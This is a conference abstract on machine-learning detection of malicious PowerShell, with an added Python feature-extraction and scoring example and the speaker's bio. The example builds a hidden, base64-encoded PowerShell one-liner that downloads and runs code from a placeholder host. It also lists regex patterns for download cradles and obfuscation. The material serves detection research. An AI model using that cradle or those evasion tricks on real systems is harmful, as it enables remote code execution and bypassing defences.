Detecting Advanced Powershell Threats (APTs) with Machine Learning

Georgelin Manuel, Software Developer, K7 Computing

Advanced threat actors leverage the power and flexibility of PowerShell scripts to launch sophisticated attacks on their targets while managing to fly under the radar. These silent PowerShell scripts can be used in the initial phase of the attack as downloaders, or to move laterally on a network post-compromise. As PowerShell is supported by default on all modern Windows machines, it is an indispensable tool for a persistent attacker.

Security vendors have been relatively slow in responding to this modern threat because PowerShell scripts present unique challenges and introduce unusual attack vectors. They can be fileless, running directly from memory, and can easily be embedded in weaponized documents. As in most other scripting languages, PowerShell scripts can easily be encoded and obfuscated, helping malicious scripts to bypass detection engines. Process-based behavioural HIPS is also difficult, since these scripts are interpreted by OS executables that cannot simply be blocked.

Among general consumers, legitimate use of PowerShell scripts is typically limited to applications and to a few tech-savvy users. In an enterprise environment, however, the use of PowerShell scripts for system administration has gained traction over the years. A defensive approach of blocking all PowerShell scripts by default is therefore not a viable option. Restricting PowerShell usage to authoritatively signed scripts does provide some level of protection in certain environments, but once an environment is compromised, most bets are off.

This presentation describes methods to protect against malicious PowerShell scripts using a combination of machine learning and 'traditional' methods. We will cover the pros and cons of the various methods, along with our research and analysis results. We will also explore the efficacy of relatively new additions to the Windows security ecosystem, such as the Antimalware Scan Interface (AMSI) and more detailed event logs, in the context of PowerShell scripts.
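To make the "combination of machine learning and traditional methods" concrete, the following is an added example written for this page, not code from the presentation or from K7 Computing. It extracts a handful of static features from a PowerShell script (length, Shannon entropy, decoded `-EncodedCommand` payloads, and counts of common obfuscation and download-cradle indicators) and combines them with a hypothetical weighted score; a real classifier would learn the weights from labelled samples instead. The two scripts and the weights are constructed for the example.

```python
import base64
import math
import re
from collections import Counter

# Constructed samples (hypothetical, not from the presentation).
BENIGN_SCRIPT = r"""
# Nightly disk-space report
Get-PSDrive -PSProvider FileSystem |
    Select-Object Name, Used, Free |
    Export-Csv -Path 'C:\Reports\disk.csv' -NoTypeInformation
"""

# An encoded one-liner of the kind the abstract describes. powershell.exe
# -EncodedCommand expects base64 of UTF-16LE text, so we build it the same way.
_DECODED = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SUSPICIOUS_SCRIPT = (
    "powershell.exe -NoP -W Hidden -Enc "
    + base64.b64encode(_DECODED.encode("utf-16le")).decode("ascii")
)

# -e / -en / -enc / -encodedcommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicator patterns; each becomes a count feature.
INDICATORS = {
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "backtick_obfuscation": re.compile(r"[A-Za-z]`[A-Za-z]"),   # e.g. I`E`X
    "char_concat": re.compile(r"\[char\]\s*\d+", re.I),          # [char]105+[char]101...
}

# Hypothetical weights; a trained model would replace these.
WEIGHTS = {
    "encoded_command_count": 3, "iex": 2, "download": 2,
    "hidden_window": 1, "no_profile": 1, "backtick_obfuscation": 1, "char_concat": 1,
}


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded/packed content scores noticeably higher than prose."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_encoded_commands(script: str) -> list[str]:
    """Return the UTF-16LE text of every -EncodedCommand blob that decodes cleanly."""
    decoded = []
    for match in ENCODED_FLAG.finditer(script):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # malformed blob: leave it to the raw-text indicators
    return decoded


def extract_features(script: str) -> dict:
    """Static features over the script plus any decoded payloads it carries."""
    decoded = decode_encoded_commands(script)
    # Indicators are counted over the visible text AND the decoded payloads,
    # so encoding alone does not hide a download cradle from the features.
    visible = script + "\n" + "\n".join(decoded)
    feats = {
        "length": len(script),
        "entropy": round(shannon_entropy(script), 3),
        "encoded_command_count": len(decoded),
    }
    for name, pattern in INDICATORS.items():
        feats[name] = len(pattern.findall(visible))
    return feats


def score(feats: dict) -> int:
    """Toy linear score; each count is capped so one repeated token cannot dominate."""
    total = sum(w * min(feats[k], 3) for k, w in WEIGHTS.items())
    if feats["entropy"] > 5.0:   # base64/packed text sits well above typical script text
        total += 1
    return total


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SCRIPT), ("suspicious", SUSPICIOUS_SCRIPT)):
        f = extract_features(sample)
        print(label, score(f), f)
```

The point of decoding the `-EncodedCommand` blob before counting indicators is the same one the abstract makes about AMSI: inspect the content the interpreter will actually run, not only the bytes as they appear on disk or on the command line.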

Georgelin Manuel

Georgelin Manuel graduated from Cochin University of Science and Technology with a Master's degree in Computer and Information Science. Since joining K7 Computing, he has been involved in enhancing product features and researching data mining techniques, applying machine learning algorithms to various file formats and focusing primarily on Win32 Portable Executables. His interests are data mining and machine learning.